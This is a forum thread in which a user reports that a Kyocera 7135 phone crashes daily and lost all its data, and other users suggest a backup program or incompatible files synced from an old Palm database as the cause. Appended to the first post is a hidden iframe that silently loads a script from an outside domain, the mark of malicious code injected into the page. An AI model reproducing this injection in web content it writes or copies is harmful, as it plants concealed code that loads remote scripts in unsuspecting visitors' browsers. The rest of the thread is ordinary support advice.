+ Reply to Thread

7135 Crashed. Lost All my data!!

Since I have had my 7135, it has crashed (fatal error) at least once a day. This week, it crashed and would not restart without a hard reset (cannot remember the error message). When it came back up I had lost all the data and applications that I had added. I was on the road at a conference, so I was really hosed.

I had been running the followings apps:
    Avantgo
    Vindigo
    DopeWars
    X-Man
    PhotoView

Had anyone had the same experience? Or, does anyone have any clues as to what may have caused this. This is a really great phone, but I simply cannot afford to have this a happen again><iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Hard to say what is causing it without knowing more details of the circumstances of when it happens but...

The one app I didn't see in your list is a backup program. You should at least use one of the free ones (backup buddy is great) and backup your info to a card. Then the pain wouldn't be so great. I use the full version of backup buddy vfs and have it set to back up my info every morning at 4:00am.

Only time I've needed to recover from it was when updating my firmware.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Administrator
    did you suync your 7135 form an old palm db? if so, you could have installed some non compatible files to the phone...